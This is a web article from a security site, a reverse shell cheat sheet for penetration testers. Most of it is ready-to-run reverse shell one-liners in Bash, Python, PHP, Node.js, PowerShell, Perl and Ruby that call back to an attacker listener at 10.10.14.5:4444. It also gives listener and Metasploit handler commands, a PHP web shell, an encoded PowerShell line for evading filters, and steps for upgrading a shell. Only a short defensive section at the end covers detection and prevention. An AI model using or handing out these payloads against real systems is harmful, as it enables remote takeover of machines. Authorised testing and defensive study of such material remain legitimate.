Reverse Shell Cheat Sheet: Every Payload for Pentesters (2026 Updated)
On this page
What Is a Reverse Shell?
A reverse shell makes the target machine connect back to the attacker's machine, providing an interactive command line. Unlike a bind shell (which opens a port on the target), reverse shells work through firewalls because the connection is outbound.
Attacker (Listener) Target (Victim)
┌────────────────┐ ┌────────────────┐
│ nc -lvnp 4444 │◄─────────────│ Reverse Shell │
│ IP: 10.10.14.5 │ Outbound │ Payload Runs │
│ Waits for │ Connection │ Connects to │
│ connection │ │ attacker:4444 │
└────────────────┘ └────────────────┘
⚠️ Legal disclaimer: Only use these on systems you own or have explicit written authorization to test. Unauthorized access is a criminal offense.
Setting Up the Listener
# Basic Netcat listener
nc -lvnp 4444
# Netcat with readline (better UX)
rlwrap nc -lvnp 4444
# Socat (upgraded interactive shell)
socat file:\`tty\`,raw,echo=0 tcp-listen:4444
# Metasploit multi/handler
msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"
Reverse Shell Payloads by Language
Bash
# Standard bash reverse shell
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
# Alternative with explicit redirection
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
# Using /dev/tcp (if bash supports it)
exec 5<>/dev/tcp/10.10.14.5/4444; cat <&5 | while read line; do $line 2>&5 >&5; done
Python
# Python 3 reverse shell
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
# Python 2 (legacy systems)
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
PHP
# PHP reverse shell
php -r '$sock=fsockopen("10.10.14.5",4444);exec("bash <&3 >&3 2>&3");'
# PHP command execution via web shell
<?php system($_GET['cmd']); ?>
// Usage: http://target.com/shell.php?cmd=id
Node.js
// Node.js reverse shell
require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/4444 0>&1')
// Pure Node.js (no bash dependency)
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("bash",[]);var client=new net.Socket();client.connect(4444,"10.10.14.5",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client)});})()
PowerShell (Windows)
# PowerShell reverse shell
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# Encoded PowerShell (bypass basic filters)
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0A...
Perl
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'
Ruby
ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.5",4444))'
Upgrading to a Fully Interactive Shell
After getting a basic reverse shell, upgrade it:
# Step 1: Spawn a PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Step 2: Background the shell
Ctrl+Z
# Step 3: Fix terminal settings
stty raw -echo; fg
# Step 4: Set terminal type
export TERM=xterm
export SHELL=bash
stty rows 50 cols 200
Defensive Detection
Network Indicators
# Detect outbound connections from web servers
ss -tlnp | grep -v LISTEN
lsof -i -P | grep ESTABLISHED | grep -v sshd
# Look for unusual outbound connections
netstat -an | grep ESTABLISHED | grep -v ':22\|:80\|:443'
Process Monitoring
# Detect spawned shells
ps aux | grep -E 'bash|sh|python|perl|ruby|nc|ncat|socat' | grep -v grep
# Check for /dev/tcp usage (bash reverse shells)
grep -r '/dev/tcp' /proc/*/fd/ 2>/dev/null
Prevention
- Egress filtering — Block outbound connections from web servers except to known services
- Application allowlisting — Only approved binaries can execute
- Disable unnecessary interpreters — Remove Python, Perl, Ruby from production web servers
- Monitor /dev/tcp — Alert on bash processes accessing /dev/tcp
- Container isolation — Run applications in containers with minimal tools
- WAF rules — Block payloads containing reverse shell patterns
Published by SecureCodeReviews
This article is part of our original AI security and cybersecurity content library. We show publish and update dates, keep company and policy pages public, and update important guidance when material changes affect readers.
Want an expert review before this issue reaches production?
We combine manual code review with AppSec tooling to find vulnerabilities, logic flaws, and insecure patterns before release or audit deadlines.
Advertisement
Free Security Tools
Try our tools now
Expert Services
Get professional help
OWASP Top 10
Learn the top risks
Related Articles
Threat Modeling for Developers: STRIDE, PASTA & DREAD with Practical Examples
Threat modeling is the most cost-effective security activity — finding design flaws before writing code. This guide covers STRIDE, PASTA, and DREAD methodologies with real-world examples for web, API, and cloud applications.
Building a Security Champions Program: Scaling Security Across Dev Teams
Security teams can't review every line of code. Security Champions embed security expertise in every development team. This guide covers program design, champion selection, training, metrics, and sustaining engagement.
The Ultimate Secure Code Review Checklist for 2025
A comprehensive, language-agnostic checklist for secure code reviews. Use this as your team's standard for catching vulnerabilities before they reach production.